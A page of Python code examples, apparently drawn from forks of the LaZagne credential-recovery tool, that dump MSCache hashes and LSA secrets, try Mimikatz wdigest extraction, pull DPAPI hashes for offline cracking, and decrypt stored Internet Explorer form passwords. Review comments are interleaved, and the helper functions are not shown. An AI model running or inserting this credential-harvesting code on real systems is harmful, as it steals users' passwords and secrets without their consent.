コード例 #1
def get_user_list_on_filesystem(impersonated_user=[]):
    """
    List local profile directories that still have to be processed.

    The profile root is the ``Users`` folder on ``constant.drive``, or
    ``Documents and Settings`` when the reported OS version is below 6.
    Built-in entries and every name in ``impersonated_user`` are left out.
    Returns an empty list when the profile root does not exist.
    """
    # Pre-Vista systems (version < 6) keep profiles under a different folder.
    if float(get_os_version()) < 6:
        template = u'{drive}:\\Documents and Settings'
    else:
        template = u'{drive}:\\Users'
    profiles_root = template.format(drive=constant.drive)

    if not os.path.exists(profiles_root):
        return []

    # Default entries first, then the accounts the caller has already handled.
    skipped = ['All Users', 'Default User', 'Default', 'Public', 'desktop.ini']
    skipped.extend(impersonated_user)

    # Only directories count as user profiles.
    return [
        entry for entry in os.listdir(profiles_root)
        if os.path.isdir(os.path.join(profiles_root, entry))
        and entry not in skipped
    ]
コード例 #2
ファイル: cachedump.py プロジェクト: cclauss/LaZagne
    def run(self):
        """
        Extract cached logon hashes (MSCache) via ``dump_file_hashes``.

        The 'system' and 'security' entries of ``constant.hives`` are passed to
        the parser together with a flag saying whether the OS version is 6.0
        or later. Returns ``['__MSCache__', <result>]`` when the parser yields
        a truthy result; otherwise returns ``None``.
        """
        # The parser takes this flag as its third argument.
        vista_plus = float(get_os_version()) >= 6.0

        cached_hashes = dump_file_hashes(
            constant.hives['system'],
            constant.hives['security'],
            vista_plus
        )
        if not cached_hashes:
            return None
        return ['__MSCache__', cached_hashes]
コード例 #3
ファイル: windows.py プロジェクト: KennyZeng/LaZagne
    def run(self):
        """
        Try to recover the Windows logon password, falling back to a DPAPI hash.

        - As administrator on Vista / Win7 only: try the wdigest method provided by the Mimikatz helper
        - If that yields nothing: check whether an already recovered password is also the Windows password
        - If still nothing: return the DPAPI hash (no admin privilege needed) for offline cracking with John or Hashcat

        Returns a list of dicts; the list is empty when nothing was recovered.
        """
        pwd_found = []

        # Check if Admin
        if ctypes.windll.shell32.IsUserAnAdmin() != 0:
            # https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx
            # Only these two version strings take the wdigest path; every other version skips it.
            supported_os = {
                '6.0': 'Vista',
                '6.1': 'Win7',
            }
            os_version = get_os_version()
            if os_version in supported_os:
                # NOTE(review): this local named `os` shadows the `os` module name inside this method.
                os = supported_os[os_version]
                arch = 'x86'
                if isx64machine():
                    arch = 'x64'

                # NOTE(review): presumably enables SeDebugPrivilege for this process (helper not shown here).
                # That privilege change by an unexpected binary is a useful detection point for defenders.
                if get_debug_privilege():
                    # Ready to find passwords
                    self.info('Using mimikatz method')

                    m = Mimikatz(os=os, arch=arch)
                    pwd_found = m.find_wdigest_password()

        # Fallback path: runs whenever the wdigest attempt was skipped or returned nothing.
        if not pwd_found:
            if constant.dpapi:
                # Check if a password already found is a windows password
                password = constant.dpapi.get_cleartext_password()
                if password:
                    pwd_found.append({
                        'Login': constant.username,
                        'Password': password
                    })
                else:
                    # Retrieve dpapi hash used to bruteforce (hash can be retrieved without needed admin privilege)
                    # Method taken from Jean-Christophe Delaunay - @Fist0urs
                    # https://www.synacktiv.com/ressources/univershell_2017_dpapi.pdf

                    self.info(u'Windows passwords not found.\nTry to bruteforce this hash (using john or hashcat) '
                              u'depending on your context (domain environment or not)')
                    # NOTE(review): redundant check, the enclosing branch already tested constant.dpapi.
                    if constant.dpapi:
                        # The hash is requested for a 'domain' or 'local' context.
                        context = 'local'
                        if self.is_in_domain():
                            context = 'domain'

                        h = constant.dpapi.get_dpapi_hash(context=context)
                        if h:
                            # NOTE(review): get_dpapi_hash is called a second time with the same
                            # context instead of reusing `h`.
                            pwd_found.append({
                                'Dpapi_hash_{context}'.format(context=context): constant.dpapi.get_dpapi_hash(
                                                                                                        context=context)
                            })

        return pwd_found
コード例 #4
ファイル: ie.py プロジェクト: yongqin12/LaZagne
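    def run(self, historic=''):
        """
        Recover Internet Explorer form passwords from the current user's
        IntelliForms Storage2 registry key.

        Each registry value name starts with a 40-character hash. A value can
        only be deciphered when that hash matches an entry returned by
        ``self.get_hash_table``; values without a match are counted and
        reported as not decrypted.

        :param historic: optional path to a text file whose stripped lines are
                         handed to ``self.get_hash_table`` (presumably extra
                         URLs; the helper is not shown here)
        :return: list of recovered entries, or ``None`` when the OS version is
                 above 6.1 (the message points to the vault module instead)
        """
        if float(win.get_os_version()) > 6.1:
            print_debug(
                'INFO',
                u'Internet Explorer passwords are stored in Vault (check vault module)'
            )
            return

        pwd_found = []
        try:
            hkey = win.OpenKey(
                win.HKEY_CURRENT_USER,
                'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
            )
        except Exception:
            print_debug('DEBUG', traceback.format_exc())
        else:
            nb_site = 0
            nb_pass_found = 0
            try:
                lists = []
                if historic:
                    if os.path.exists(historic):
                        # Context manager closes the file; the original left it open.
                        with open(historic, 'r') as f:
                            lists = [line.strip() for line in f]
                    else:
                        print_debug('WARNING',
                                    u'The text file %s does not exist' % historic)

                # retrieve the urls from the history
                hash_tables = self.get_hash_table(lists)

                num = _winreg.QueryInfoKey(hkey)[1]
                for x in range(0, num):
                    k = _winreg.EnumValue(hkey, x)
                    if k:
                        nb_site += 1
                        for h in hash_tables:
                            # both hashes match, so the password can be deciphered
                            if h[1] == k[0][:40].lower():
                                nb_pass_found += 1
                                cipher_text = k[1]
                                pwd_found += self.decipher_password(
                                    cipher_text, h[0])
                                break
            finally:
                # Release the registry handle even if enumeration or deciphering raises.
                _winreg.CloseKey(hkey)

            # manage errors
            if nb_site > nb_pass_found:
                print_debug(
                    'ERROR',
                    u'%s hashes have not been decrypted, the associate website used to decrypt the '
                    u'passwords has not been found' %
                    str(nb_site - nb_pass_found))

        return pwd_found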
コード例 #5
    def run(self):
        """
        Run ``dump_file_hashes`` and wrap its result under the MSCache tag.

        Returns ``['__MSCache__', <result>]`` for a truthy result, otherwise
        ``None``.
        """
        # True when the reported OS version is 6.0 or later.
        is_vista_or_higher = 6.0 <= float(get_os_version())

        system_hive = constant.hives['system']
        security_hive = constant.hives['security']
        mscache = dump_file_hashes(system_hive, security_hive, is_vista_or_higher)

        return ['__MSCache__', mscache] if mscache else None
コード例 #6
    def run(self):
        """
        Recover Internet Explorer form passwords from the current user's
        IntelliForms Storage2 registry key.

        A stored value is deciphered only when the first 40 characters of its
        name (lower-cased) equal a hash from ``self.get_hash_table()``. Values
        without a match are counted and reported through ``self.error``.
        Returns the list of recovered entries, or ``None`` when the OS version
        is above 6.1.
        """
        if float(win.get_os_version()) > 6.1:
            self.debug(
                u'Internet Explorer passwords are stored in Vault (check vault module)'
            )
            return

        recovered = []
        try:
            storage_key = win.OpenKey(
                win.HKEY_CURRENT_USER,
                'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
            )
        except Exception:
            # Key missing or unreadable: log the traceback and return the empty list.
            self.debug(traceback.format_exc())
            return recovered

        entries_seen = 0
        entries_decrypted = 0

        # Candidate entries; index 0 is the deciphering input, index 1 its hash.
        candidates = self.get_hash_table()

        value_count = winreg.QueryInfoKey(storage_key)[1]
        for index in range(value_count):
            entry = winreg.EnumValue(storage_key, index)
            if not entry:
                continue
            entries_seen += 1
            for candidate in candidates:
                # Matching hashes mean this candidate can decipher the stored value.
                if candidate[1] == entry[0][:40].lower():
                    entries_decrypted += 1
                    recovered.extend(
                        self.decipher_password(entry[1], candidate[0]))
                    break

        winreg.CloseKey(storage_key)

        # Report the values for which no matching candidate was found.
        if entries_seen > entries_decrypted:
            self.error(
                u'%s hashes have not been decrypted, the associate website used to decrypt the '
                u'passwords has not been found' %
                str(entries_seen - entries_decrypted))

        return recovered
コード例 #7
    def run(self):
        """
        Return the LSA secrets, computing them at most once per process.

        If ``constant.lsa_secrets`` is already populated it is returned as is.
        Otherwise ``get_file_secrets`` is called with the 'system' and
        'security' entries of ``constant.hives``. The 'DPAPI_SYSTEM' entry is
        trimmed to bytes 16..59 and the result is cached in
        ``constant.lsa_secrets``. Returns ``['__LSASecrets__', <secrets>]``, or
        ``None`` when nothing was extracted.

        Note that the secrets stay referenced from module-level state for the
        lifetime of the process.
        """
        # The DPAPI code may have computed the secrets already; reuse them.
        cached = constant.lsa_secrets
        if cached:
            return ['__LSASecrets__', cached]

        vista_plus = float(get_os_version()) >= 6.0

        # Get LSA Secrets
        secrets = get_file_secrets(
            constant.hives['system'],
            constant.hives['security'],
            vista_plus
        )
        if not secrets:
            return None

        raw_dpapi_system = secrets['DPAPI_SYSTEM']
        # The leading little-endian 32-bit field is parsed but never used afterwards.
        _declared_size = struct.unpack_from("<L", raw_dpapi_system)[0]
        # Keep only the 44 bytes starting at offset 16.
        offset, length = 16, 44
        secrets['DPAPI_SYSTEM'] = raw_dpapi_system[offset:offset + length]

        # Keep value to be reused in other modules (e.g. wifi)
        constant.lsa_secrets = secrets
        return ['__LSASecrets__', secrets]
コード例 #8
ファイル: ie.py プロジェクト: cclauss/LaZagne
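    def run(self):
        """
        Recover Internet Explorer form passwords from the current user's
        IntelliForms Storage2 registry key.

        A stored value is deciphered only when the first 40 characters of its
        name (lower-cased) equal a hash from ``self.get_hash_table()``. Values
        without a match are counted and reported through ``self.error``.

        :return: list of recovered entries, or ``None`` when the OS version is
                 above 6.1 (the message points to the vault module instead)
        """
        if float(win.get_os_version()) > 6.1:
            self.debug(u'Internet Explorer passwords are stored in Vault (check vault module)')
            return

        pwd_found = []
        try:
            hkey = win.OpenKey(win.HKEY_CURRENT_USER, 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2')
        except Exception:
            self.debug(traceback.format_exc())
        else:
            nb_site = 0
            nb_pass_found = 0
            try:
                # retrieve the urls from the history
                hash_tables = self.get_hash_table()

                num = winreg.QueryInfoKey(hkey)[1]
                for x in range(0, num):
                    k = winreg.EnumValue(hkey, x)
                    if k:
                        nb_site += 1
                        for h in hash_tables:
                            # both hashes match, so the password can be deciphered
                            if h[1] == k[0][:40].lower():
                                nb_pass_found += 1
                                cipher_text = k[1]
                                pwd_found += self.decipher_password(cipher_text, h[0])
                                break
            finally:
                # Release the registry handle even if enumeration or deciphering raises;
                # the original leaked it on any exception raised after OpenKey.
                winreg.CloseKey(hkey)

            # manage errors
            if nb_site > nb_pass_found:
                self.error(u'%s hashes have not been decrypted, the associate website used to decrypt the '
                           u'passwords has not been found' % str(nb_site - nb_pass_found))

        return pwd_found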
コード例 #9
ファイル: users.py プロジェクト: cclauss/LaZagne
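def get_user_list_on_filesystem(impersonated_user=()):
    """
    List local profile directories that still have to be processed.

    The profile root is the ``Users`` folder on ``constant.drive``, or
    ``Documents and Settings`` when the reported OS version is below 6.

    :param impersonated_user: iterable of profile names to leave out because
                              they were already handled. The default is an
                              immutable empty tuple, not a shared mutable list.
    :return: list of directory names under the profile root, without the
             built-in entries and without the names in ``impersonated_user``;
             empty when the profile root does not exist
    """
    # Check users existing on the system (get only directories)
    user_path = u'{drive}:\\Users'.format(drive=constant.drive)
    if float(get_os_version()) < 6:
        user_path = u'{drive}:\\Documents and Settings'.format(drive=constant.drive)

    if not os.path.exists(user_path):
        return []

    # Default entries plus the users that have already been impersonated.
    excluded = ['All Users', 'Default User', 'Default', 'Public', 'desktop.ini']
    excluded.extend(impersonated_user)

    # One filtering pass replaces the repeated list.remove() scans.
    return [
        filename for filename in os.listdir(user_path)
        if os.path.isdir(os.path.join(user_path, filename)) and filename not in excluded
    ]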